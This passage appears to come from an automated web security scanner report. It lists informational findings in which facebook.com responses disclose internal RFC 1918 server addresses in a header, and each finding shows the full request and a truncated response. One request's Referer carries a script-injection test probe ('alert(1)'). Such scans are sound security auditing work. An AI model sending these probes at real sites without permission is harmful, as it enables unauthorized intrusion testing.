24.186. http://www.facebook.com/directory/pages/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.102.50
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:38 GMT
Content-Length: 49022

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="0cuF";</scrip
...[SNIP]...

24.187. http://www.facebook.com/directory/people/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.82.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:34 GMT
Content-Length: 39849

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="kzvV";</scrip
...[SNIP]...

24.188. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=113869198637480&app_id=113869198637480&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11a0622e8%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff25fdb50e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d8882464%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff25fdb50e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb840448%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe926613%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff25fdb50e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb840448&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df47b73648%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff25fdb50e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb840448&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32c5a332%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff25fdb50e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb840448&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.92.57
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:55 GMT
Content-Length: 254

<script type="text/javascript">
parent.postMessage("cb=f47b73648&origin=http\u00253A\u00252F\u00252Fdevelopers.facebook.com\u00252Ff25fdb50e&relation=parent&transport=postmessage&frame=fb840448", "htt
...[SNIP]...

24.189. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=140669015975185&app_id=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ac4379ac%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3aadaff6%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1df0ea0e8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ab3bb878%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1df0ea0e8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c832e914%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1df0ea0e8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d83e624%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1df0ea0e8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.137.31
X-Cnection: close
Date: Tue, 19 Jul 2011 18:36:05 GMT
Content-Length: 251

<script type="text/javascript">
parent.postMessage("cb=f1c832e914&origin=http\u00253A\u00252F\u00252Fwww.ticketmaster.com\u00252Ffc54d770c&relation=parent&transport=postmessage&frame=f1df0ea0e8", "htt
...[SNIP]...

24.190. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.0.51
X-Cnection: close
Date: Tue, 19 Jul 2011 15:15:34 GMT
Content-Length: 0


24.191. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_998904&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_998904&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.46
X-Cnection: close
Date: Tue, 19 Jul 2011 23:39:20 GMT
Content-Length: 0


24.192. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b6b61bb%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff661fbb9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26485fa0%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff661fbb9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39002db7%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2499a3fe%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff661fbb9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39002db7&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b1ce1fd%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff661fbb9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39002db7&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f7015e6%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff661fbb9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39002db7&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.137.33
X-Cnection: close
Date: Tue, 19 Jul 2011 18:35:24 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f3b1ce1fd&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff661fbb9c&relation=parent&transport=postmessage&frame=f39002db7", "http:\/\/
...[SNIP]...

24.193. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.89.41
X-Cnection: close
Date: Tue, 19 Jul 2011 18:31:25 GMT
Content-Length: 0


24.194. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.250.50
X-Cnection: close
Date: Tue, 19 Jul 2011 18:31:15 GMT
Content-Length: 0


24.195. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35b9a58314b95c%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3346ee4876c972%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35bf96bc227ade%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8d49a072d0574%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35bf96bc227ade&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df358bc356cb439a%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35bf96bc227ade&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df49cf977973f6a%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35bf96bc227ade&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.216.41
X-Cnection: close
Date: Tue, 19 Jul 2011 18:43:44 GMT
Content-Length: 261

<script type="text/javascript">
parent.postMessage("cb=f358bc356cb439a&origin=http\u00253A\u00252F\u00252Fwww.fansnap.com\u00252Ff22f9e9b374e2e&relation=parent&transport=postmessage&frame=f35bf96bc227
...[SNIP]...

24.196. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d961068c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ffff71269%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df913adbd%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ffff71269%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df180469bac%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6bfe024c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ffff71269%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df180469bac&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e322acf4%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ffff71269%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df180469bac&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1650bc3d8%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ffff71269%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df180469bac&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca'%3balert(1)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.191.63
X-Cnection: close
Date: Tue, 19 Jul 2011 19:37:13 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f2e322acf4&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ffff71269&relation=parent&transport=postmessage&frame=f180469bac", "http:\/\
...[SNIP]...

24.197. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c66a7b7d84e7a%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e913c7b336fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfff006a01b356%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e913c7b336fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb38258b47c1e4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37d67ef5620c6%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e913c7b336fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb38258b47c1e4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20a730148e3ed8%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e913c7b336fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb38258b47c1e4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b43c07a5038ba%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e913c7b336fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb38258b47c1e4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
